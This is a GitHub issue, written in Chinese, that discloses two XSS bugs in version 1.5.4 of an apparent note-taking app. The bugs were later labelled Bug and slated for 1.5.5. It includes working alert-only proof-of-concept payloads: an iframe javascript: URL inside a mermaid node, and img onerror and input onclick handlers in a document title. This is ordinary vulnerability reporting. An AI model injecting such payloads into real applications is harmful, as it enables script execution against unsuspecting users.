Skip to content

存在两处 XSS #3587

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
fupinglee opened this issue Dec 9, 2021 · 0 comments
Closed

存在两处 XSS #3587

fupinglee opened this issue Dec 9, 2021 · 0 comments
Assignees
@88250 @Vanessa219
Labels
Bug
Milestone
1.5.5

Comments

@fupinglee
Copy link

版本:1.5.4 ,在macos下测试
001

第一处:
POC

```mermaid
graph LR
id1["<iframe src=javascript:alert('xss')></iframe>"]

01

第二处:
新建一个文档名字为

我是标题<img src=1 onerror=alert(1)><input onclick=alert(112)>

选中后删除即可触发
02
03
点击输入框可触发
04
@88250 88250 changed the title 存在两处xss 存在两处 XSS Dec 10, 2021
@88250 88250 added the Bug label Dec 10, 2021
@88250 88250 added this to the backlog milestone Dec 10, 2021
@Vanessa219 Vanessa219 modified the milestones: backlog, 1.5.5 Dec 13, 2021
@88250 88250 mentioned this issue Dec 13, 2021
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@88250 88250

@Vanessa219 Vanessa219

Labels
Bug
Projects
None yet
Milestone
1.5.5
Development

No branches or pull requests
3 participants
@88250 @Vanessa219 @fupinglee